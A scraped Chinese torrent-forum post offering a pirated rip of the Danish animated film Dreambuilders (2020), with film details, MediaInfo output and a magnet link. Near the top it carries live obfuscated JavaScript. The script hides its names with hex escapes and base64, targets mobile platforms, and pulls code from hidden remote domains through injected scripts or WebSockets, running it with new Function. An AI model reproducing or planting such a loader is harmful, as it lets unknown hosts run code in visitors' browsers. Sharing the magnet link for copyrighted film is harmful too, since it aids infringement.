筑梦者[粤语音轨/简繁字幕]Dreambuilders.2020.BluRay.1080p.2Audio.TrueHD.5.1.x265.10bit-迅雷下载 8.10GB

版主小s 2月前 282

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 筑梦者 / 筑梦奇迹(台) / Dreambuilders / 築夢奇蹟(港)

◎片 名 Dr?mmebyggerne

◎年 代 2020

◎产 地 丹麦

◎类 别 剧情 / 喜剧 / 动画 / 奇幻 / 冒险

◎语 言 丹麦语

◎上映日期 2020-02-06

◎IMDb链接 https://www.imdb.com/title/tt9855978/

◎豆瓣评分 6.1/10 (112人评价)

◎豆瓣链接 https://movie.douban.com/subject/34966086/

◎片 长 81分钟

◎演 员 卢克·格瑞芬 Luke Griffin (id:1421866)

Alberte Winding Alberte Winding (id:1164684)

保罗·泰来克 Paul Tylak (id:1378949)

拉斯马斯·伯托夫特 Rasmus Botoft (id:1017024)

马丁·巴赫 Martin Buch (id:1070633)

迪特·汉森 Ditte Hansen (id:1345785)

◎标 签 动画 / 丹麦 / 奇幻 / 亲情 / 成长 / 2020 / 冒险 / 电影

◎简 介

It centers on Minna, a young girl who misuses her newfound ability to create and control other people's dreams to teach her bothersome stepsister a lesson.

  1. General

  2. Unique ID : 144709762499457074959285831083769897374 (0x6CDE1623D5900E7176BCB1EEC0BAA19E)

  3. Complete name : Dre[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.10 GiB

  7. Duration : 1 h 20 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 14.4 Mb/s

  10. Encoded date : UTC 2021-07-13 08:37:25

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 20 min

  20. Bit rate : 6 870 kb/s

  21. Width : 1 920 pixels

  22. Height : 806 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.185

  30. Stream size : 3.86 GiB (48%)

  31. Title : HEVC, [email protected]@High, 24 fps @ 6869 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x806 / interlace=0 / total-frames=115728 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : MLP FBA

  44. Format/Info : Meridian Lossless Packing FBA

  45. Commercial name : Dolby TrueHD

  46. Codec ID : A_TRUEHD

  47. Duration : 1 h 20 min

  48. Bit rate mode : Variable

  49. Bit rate : 3 012 kb/s

  50. Maximum bit rate : 4 116 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 96.0 kHz

  54. Frame rate : 1 200.000 FPS (80 SPF)

  55. Compression mode : Lossless

  56. Stream size : 1.69 GiB (21%)

  57. Title : English Dolby TrueHD Audio 5.1 @ 3652 kbps

  58. Language : English

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 1 h 20 min

  68. Bit rate mode : Constant

  69. Bit rate : 640 kb/s

  70. Channel(s) : 6 channels

  71. Channel layout : L R C LFE Ls Rs

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 368 MiB (4%)

  76. Title : English Dolby Digital Audio 5.1 @ 640 kbps

  77. Language : English

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Audio #3

  82. ID : 4

  83. Format : MLP FBA

  84. Format/Info : Meridian Lossless Packing FBA

  85. Commercial name : Dolby TrueHD

  86. Codec ID : A_TRUEHD

  87. Duration : 1 h 20 min

  88. Bit rate mode : Variable

  89. Bit rate : 3 036 kb/s

  90. Maximum bit rate : 4 158 kb/s

  91. Channel(s) : 6 channels

  92. Channel layout : L R C LFE Ls Rs

  93. Sampling rate : 96.0 kHz

  94. Frame rate : 1 200.000 FPS (80 SPF)

  95. Compression mode : Lossless

  96. Stream size : 1.70 GiB (21%)

  97. Title : Cantonese Dolby TrueHD Audio 2.0 @ 3676 kbps粤语

  98. Language : Chinese

  99. Default : No

  100. Forced : No


  101. Audio #4

  102. ID : 5

  103. Format : AC-3

  104. Format/Info : Audio Coding 3

  105. Commercial name : Dolby Digital

  106. Codec ID : A_AC3

  107. Duration : 1 h 20 min

  108. Bit rate mode : Constant

  109. Bit rate : 640 kb/s

  110. Channel(s) : 6 channels

  111. Channel layout : L R C LFE Ls Rs

  112. Sampling rate : 48.0 kHz

  113. Frame rate : 31.250 FPS (1536 SPF)

  114. Compression mode : Lossy

  115. Stream size : 368 MiB (4%)

  116. Title : Cantonese Dolby Digital Audio 5.1 @ 640 kbps 粤语

  117. Language : Chinese

  118. Service kind : Complete Main

  119. Default : No

  120. Forced : No


  121. Text #1

  122. ID : 6

  123. Format : PGS

  124. Codec ID : S_HDMV/PGS

  125. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  126. Duration : 1 h 17 min

  127. Bit rate : 31.8 kb/s

  128. Count of elements : 1921

  129. Stream size : 17.7 MiB (0%)

  130. Title : Cht/SUP 原盘繁体

  131. Language : Chinese

  132. Default : No

  133. Forced : No


  134. Text #2

  135. ID : 7

  136. Format : PGS

  137. Codec ID : S_HDMV/PGS

  138. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  139. Duration : 1 h 17 min

  140. Bit rate : 29.7 kb/s

  141. Count of elements : 1921

  142. Stream size : 16.5 MiB (0%)

  143. Title : Chs/SUP 原盘简体

  144. Language : Chinese

  145. Default : Yes

  146. Forced : No


  147. Text #3

  148. ID : 8

  149. Format : PGS

  150. Codec ID : S_HDMV/PGS

  151. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  152. Duration : 1 h 17 min

  153. Bit rate : 33.4 kb/s

  154. Count of elements : 1930

  155. Stream size : 18.6 MiB (0%)

  156. Title : Eng/SUP

  157. Language : English

  158. Default : No

  159. Forced : No


  160. Menu

  161. 00:00:00.000 : en:第 01 章

  162. 00:05:59.000 : en:第 02 章

  163. 00:12:32.000 : en:第 03 章

  164. 00:23:27.875 : en:第 04 章

  165. 00:34:36.417 : en:第 05 章

  166. 00:39:07.208 : en:第 06 章

  167. 00:44:59.292 : en:第 07 章

  168. 00:48:22.417 : en:第 08 章

  169. 00:54:23.375 : en:第 09 章

  170. 01:00:15.583 : en:第 10 章

  171. 01:07:29.000 : en:第 11 章

  172. 01:13:30.625 : en:第 12 章


TAGS 奇幻 冒险 剧情 动画 喜剧

磁力链:
  • magnet:?xt=urn:btih:06D855A71F2FE7CCE259ACF273B2F28EEE2528BC
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回